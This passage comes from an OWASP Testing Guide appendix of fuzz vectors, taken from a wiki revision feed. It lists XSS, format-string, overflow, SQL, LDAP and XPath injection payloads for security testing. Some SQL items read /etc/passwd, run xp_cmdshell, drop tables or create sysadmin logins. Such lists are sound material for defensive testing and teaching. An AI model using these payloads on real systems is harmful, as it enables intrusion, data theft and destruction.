SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;&amp;lt;WBR&amp;gt;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x09;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0A;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;amp;#x0D;ascript:alert(&amp;lt;WBR&amp;gt;'XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Buffer Overflows (BFO) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here. &lt;br /&gt;
&lt;br /&gt;
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 5&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 17&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 33&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 65&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 513&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 1024&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 2049&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 4097&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 8193&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;A x 12288&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Errors (FSE) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
.1024d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
%.2049d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Integer Overflows (INT) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Passive SQL Injection (SQP) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select &lt;br /&gt;
&amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Active SQL Injection (SQI) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Wisec</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13692</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=13692"/>
				<updated>2006-11-26T10:07:58Z</updated>
		
		<summary type="html">&lt;p&gt;Wisec: /* Replasive fuzzing */ replaced owasp.org with example.com&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replasive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replasive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
Brief description here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&amp;lt;IMG&lt;br /&gt;
SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
